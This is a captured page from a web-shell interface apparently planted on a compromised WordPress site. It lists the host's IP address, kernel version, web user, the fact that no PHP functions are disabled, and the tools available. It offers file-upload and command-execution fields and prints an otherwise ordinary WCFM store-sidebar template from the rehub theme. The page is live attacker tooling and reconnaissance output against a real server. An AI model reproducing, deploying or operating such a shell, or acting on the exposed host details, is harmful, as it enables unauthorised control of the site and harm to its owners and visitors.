403Webshell
Server IP : 5.129.245.98  /  Your IP : 216.73.217.19
Web Server : Apache/2.4.66 (Debian)
System : Linux 1b8c17c336b9 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/themes/rehub-theme/wcfm/store/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/themes/rehub-theme/wcfm/store/wcfmmp-view-store-sidebar.php
<?php
/**
 * The Template for displaying store sidebar.
 *
 * @package WCfM Markeplace Views Store Sidebar
 *
 * For edit coping this to yourtheme/wcfm/store 
 *
 */

if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
global $WCFM, $WCFMmp;
$store_sidebar_pos = isset( $WCFMmp->wcfmmp_marketplace_options['store_sidebar_pos'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_sidebar_pos'] : 'left';
if( $store_sidebar_pos == 'left' ) { 
	$sideclass = 'floatleft'; 
}else{
	$sideclass = 'floatright'; 
} 
if( !$WCFMmp->wcfmmp_vendor->is_store_sidebar() ) return;
$widget_args = apply_filters( 'wcfmmp_store_sidebar_args', array(
	'before_widget' => '<div class="rh-cartbox widget"><div>',
	'after_widget'  => '</div></div>',
	'before_title'  => '<div class="widget-inner-title rehub-main-font">',
	'after_title'   => '</div>',
	) );
?>

<aside class="rh-mini-sidebar user-profile-div tabletsblockdisplay <?php echo ''.$sideclass;?>">

  <?php do_action( 'wcfmmp_store_before_sidabar', $store_user->get_id() ); ?>
  
  <?php if( !is_active_sidebar( 'sidebar-wcfmmp-store' ) ) { ?>
  	
  		<?php the_widget( 'WCFMmp_Store_Product_Search', array( 'title' => esc_html__( 'Search', 'rehub-theme' ) ), $widget_args ); ?>
  	
  		<?php the_widget( 'WCFMmp_Store_Category', array( 'title' => esc_html__( 'Categories', 'rehub-theme' ) ), $widget_args ); ?>
		
		<?php the_widget( 'WCFMmp_Store_Location', array( 'title' => esc_html__( 'Store Location', 'rehub-theme' ) ), $widget_args ); ?>
		
	<?php } else { ?>
		<?php dynamic_sidebar( 'sidebar-wcfmmp-store' ); ?>
	<?php } ?>
	
	<?php do_action( 'wcfmmp_store_after_sidebar', $store_user->get_id() ); ?>
	
</aside><!-- .left_sidebar -->

Youez - 2016 - github.com/yon3zu
LinuXploit